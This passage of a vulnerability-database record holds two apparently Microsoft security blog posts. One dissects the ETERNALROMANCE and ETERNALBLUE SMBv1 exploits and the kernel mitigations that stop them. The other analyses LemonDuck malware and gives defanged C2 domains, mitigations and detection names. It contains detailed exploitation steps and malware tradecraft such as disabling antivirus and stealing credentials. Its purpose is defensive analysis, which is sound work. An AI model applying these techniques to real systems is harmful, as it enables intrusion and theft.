Guard](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/deploy-device-guard-enable-virtualization-based-security>) all contribute to breaking the exploit techniques observed in the wild. Through VBS\u2019s usage of CPU hypervisor functionality, Device Guard-enabled systems can verify and enforce integrity of code that's mapped in the kernel address space. Alongside Device Guard is the new kernel [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) (kCFG) introduced with Windows 10 Creators Update. kCFG prevents many exploitation techniques that rely on corrupting function pointers to achieve code execution.\n\nIn this blog, we provide an in-depth analysis of two of the exploits released by the Shadow Brokers. Both exploits allow arbitrary code execution through vulnerabilities in the Server Message Block (SMBv1) file-sharing server implementation.\n\nWe follow with a discussion about how Device Guard and kCFG prevent these exploits\u2014and many other exploits\u2014from installing backdoor implants in kernel memory.\n\n## The exploit kit\n\nThe kit\u2019s directory structure shows a modular exploitation framework, where payloads are kept separate from exploits.\n\n\n\n_Figure 1. Exploit kit directory structure_\n\nAll the binaries in the kit contain multiple strings that describe their purpose. Furthermore, the kit exports common functionality to DLL files, revealing additional information through referenced function names. While the strings and the function calls were not necessary for us to examine the kit, both helped speed up our initial analysis.\n\nFor more information about the individual exploits in the kit that targeted Microsoft products, refer to the [blog post from Microsoft Security Response Center](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>).\n\n## ETERNALROMANCE SMB exploit\n\nLet\u2019s dig into the guts of one of the exploits in the kit.\n\nETERNALROMANCE is a remote code execution (RCE) exploit against the legacy SMBv1 file sharing protocol. It takes advantage of [CVE-2017-0145](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which has been patched with the [MS17-010 security bulletin](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). One might note that file sharing over SMB is normally used only within local networks and that the SMB ports are typically blocked from the internet at the firewall. However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.\n\nThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a _type confusion_ vulnerability leading to an _attacker offset controlled_ arbitrary heap write. As with almost any _heap corruption_ exploit, the attacker must know or control the layout of the heap to consistently succeed. With SMB, most objects are allocated in the non-paged pool.\n\n### Getting a reliable heap layout\n\nThe exploit begins to spray the heap by starting several concurrent instances of [SMB_ COM_TRANSACTION](<https://msdn.microsoft.com/en-us/library/ee441489.aspx>). The exploit binary supports three different heap spray methods, allowing it to deal with varying pool behaviors between Windows versions. Apart from the first few allocations (the exact number depends on the pool state), transaction objects are allocated with a fixed, predictable displacement from each other. After the spray has finished, the exploit uses an info leak in a _TRANS_PEEK_NMPIPE_ transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.\n\nA network trace can quickly visualize what's going on:\n\n\n\n_Figure 2. Network packet containing leaked pool memory_\n\n### Building primitives from heap corruption\n\nThe spray has placed many _TRANSACTION_ objects on the heap at a known distance from each other. And because the exploit has leaked the size of a pointer, it knows the offsets to all fields in the _TRANSACTION_ object. The exploit can now\u2014using carefully crafted offsets\u2014use the type _confusion out-of-bounds write_ from one object to corrupt an adjacent one.\n\nBy overwriting the ID associated with the victim object with a hardcoded number (zero), the exploit can now refer to the object without knowing what the original ID was.\n\n\n\n_Figure 3. Heap layout after the spray_\n\nThe exploit proceeds to corrupt the transaction structure in a variety of ways, constructing arbitrary read-write (RW) primitives. It writes additional fields to prevent the transaction from being freed when consumed, allowing the exploit to continue reusing the same transaction for multiple requests without having to pick a new target object to corrupt.\n\n\n\n_Figure 4. InData pointer observed in WinDbg being overwritten by heap out-of-bounds write_\n\n### Installing in-memory backdoor\n\nAt this point, the exploit code attempts to plant backdoor code inside the SMB driver. This step consists of copying shellcode into the non-paged pool, corrupting a function pointer to point to the shellcode and having that function pointer executed. Note that starting with Windows 8, SMB has moved to using non-executable pools, rendering this method ineffective on newer platforms.\n\nTo find a good spot for the function pointer, the exploit follows a pointer on the heap to reach the data segment. Scanning the data segment, it proceeds to look for a table of function pointers that is used to dispatch different _SMB_COM_TRANSACTION2_ subcommands to different functions.\n\nWhen it finds the table of function pointers, the exploit overwrites the 14th entry on this table, which corresponds to the _TRANS2_SESSION_SETUP_ subcommand. [MSDN documentation](<https://msdn.microsoft.com/en-us/library/ee441654.aspx>) describes this subcommand as reserved, making it an ideal candidate for triggering the backdoor as it is almost never present in SMB traffic.\n\nWhenever an SMB packet is sent with this subcommand ID to the target device, the function pointer gets executed, triggering the shellcode. This mechanism and the backdoor code are not persistent\u2014they require a persistent second-stage component to survive a reboot.\n\n\n\n_Figure 5. Decompiled code for planting the backdoor_\n\n## ETERNALBLUE SMB exploit\n\nThe WannaCrypt malware spreads by using an adapted version of the ETERNALBLUE exploit. This bug, which targets a different SMBv1 vulnerability, is a linear buffer overrun on the pool.\n\nThe bug occurs in a special case when converting a list of [extended attributes](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff545793\\(v=vs.85\\).aspx>) (EA) from one format to another. If the list contains an EA entry that goes outside the packet buffer, the list is truncated as if it only included up to the last valid entry.\n\nWhen updating the length of the list, the size is written to as if it were a 16-bit ushort, when it is actually a 32-bit ulong. This means that the upper 16-bits are not updated when the list gets truncated:\n\n\n\n_Figure 6. Size of list of extended attributes_ (EA)\n\nThe code allocates a buffer with a size calculated to fit all EA entries up to the truncation. But as the list size was increased, this leads to a linear heap overflow with attacker controlled data.\n\nIn a similar way as before, heap is sprayed but this time with _srvnet!SRVBUFFER_ objects using the SMBv2 protocol. This object contains two key pointers that they target: an [MDL](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff554414\\(v=vs.85\\).aspx>) pointer that receives network packet payload and a pointer to a _srvnet!SRVNET_CONNECTION_ object. Both pointers are overwritten so that they point to fixed addresses in the HAL region (used by the_ hardware abstraction layer_).\n\nBecause of the corrupted MDL pointer, the next packet payload will get written to the HAL region. This payload contains shellcode and initializes the memory structure for a fake _srvnet!SRVNET_CONNECTION_ object. The connection object has a pointer to a srvnet!_SRVNET_CLIENT_CONNECTION_DISPATCH_ structure that contains function pointers.\n\nAfter the packet payload has been received, the _SRVNET_RECEIVE_HANDLER_ function pointer is executed from the attacker-controlled srvnet!_SRVNET_CLIENT_CONNECTION_DISPATCH_ structure, jumping to the shellcode.\n\nOn Windows 7, which is the system that the exploit targets, the HAL region is mapped as readable, writable, and executable. On newer systems the HAL region is no longer executable, meaning that the CPU would fault when trying to execute the shellcode. Furthermore, the HAL region and other kernel regions (such as page tables) have been randomized on the latest 64-bit versions of Windows 10, breaking assumptions of the 64-bit version in the ETERNALBLUE exploit.\n\n\n\n_Figure 7. Annotated contents of the HAL region with the fake srvnet!SRVNET_CONNECTION object_\n\n## Mitigation with virtualization-based security\n\nVirtualization-based security (VBS) provided with Device Guard on Windows 10 and kCFG enhancements with Creators Update stop common exploitation techniques, including those utilized by ETERNALROMANCE and ETERNALBLUE.\n\n### Stopping shellcode execution with W^X enforcement\n\nOn systems that have [Device Guard VBS enabled](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/deploy-device-guard-enable-virtualization-based-security>), writing and then executing shellcode\u2014such as the ETERNALROMANCE backdoor\u2014in the kernel is not possible due to W^X enforcement policies in the hypervisor. These policies ensure that a kernel memory page is never both writable and executable at any given time.\n\nEven if an attacker tries to attack page tables, the hypervisor is still able to force the _execute-disable_ bit through [extended page tables (EPT)](<https://software.intel.com/sites/default/files/managed/2b/80/5-level_paging_white_paper.pdf>). This in turn forces attackers to rely on code-reuse methods, such as return-orientation programming (ROP). As a consequence, the shellcode implant library in the Shadow Brokers release is fundamentally incompatible with VBS-protected systems.\n\n### Preventing use of corrupt function pointers with kCFG\n\nIn [Windows 10 Creators Update](<https://www.microsoft.com/en-US/windows/features>), we introduced a new security mitigation in the kernel space for VBS-enabled systems. The kernel is now compiled with [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) (CFG)\u2014a control flow integrity solution designed to prevent common stack-pivoting techniques that rely on corrupt function pointers or C++ virtual method tables.\n\nControl Flow Guard in the compiled kernel (also known as _kCFG_) aims to verify all indirect call targets before invoking them. This makes it harder for an attacker to execute code by abusing function pointers or other indirect calls.\n\nIn the case of the ETERNALROMANCE exploit, the subverted function pointer would lead to a security fault when invoked, making the exploit non-functional in its current form. The same applies for ETERNALBLUE, which also relies on a corrupted function pointer to achieve code execution.\n\n\n\n_Figure 8. With kCFG enabled, the function pointer is now verified by __guard_dispatch_icall_ptr_\n\nOn early Windows 10 systems before Creators Update and without Device Guard, it is possible to attack the page tables of the HAL region to turn it executable and gain code execution using the ETERNALBLUE exploit technique.\n\n## Secure computing with Windows 10 Creators Update\n\nWhile we actively provide patches for vulnerabilities in services like SMBv1, we strive to deliver more and more system-wide mitigations that proactively protect our users from current, as well as future, exploitation and attack methods.\n\nCustomers who run Windows 10 Creators Update benefit from [Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>) and security enhancements like kCFG and W^X. They also benefit from a [host of other security features](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-security>) that have been strengthened with Windows 10 Creators Update, including:\n\n * [Windows Defender Antivirus](<https://www.microsoft.com/en-us/windows/windows-defender>) for endpoint antimalware protection powered by the Microsoft Intelligent Security Graph, which learns from [billions of devices worldwide](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>)\n * [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) enables enterprises to detect breach activity early and respond fast; try it for free with Windows 10 Enterprise\n * [Microsoft Edge](<https://www.microsoft.com/en-au/windows/microsoft-edge>) is a proven fast browser secured by virtualization and by Windows Defender SmartScreen\n\n### Reducing exposure to SMBv1 exploits on older platforms\n\nMicrosoft strongly advises customers to apply all available security updates in a timely manner. To reduce the attack surface on your network, block inbound SMB traffic at the firewall and, if possible, [disable the SMBv1 compatibility driver](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>).\n\n \n\n_**Viktor Brange**_ \n_ Windows Offensive Security Research Team_", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-16T18:17:03", "title": "Analysis of the Shadow Brokers release and mitigation with Windows 10 virtualization-based security", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0145"], "modified": "2017-06-16T18:17:03", "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/", "id": "MMPC:C211C70545FBDF88C2F99362DC4608A8", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-08-13T21:41:38", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN _(used for lateral movement and privilege escalation)\n * _KR.BIN _(used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _&lt;File name that follows the regex pattern M[0-9]{1}[A-Z]{1}&gt;.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continuing long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>)to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>)and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>)to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>)and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. [Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries lets you search for a week&#x27;s worth of events. To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page &gt; **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on 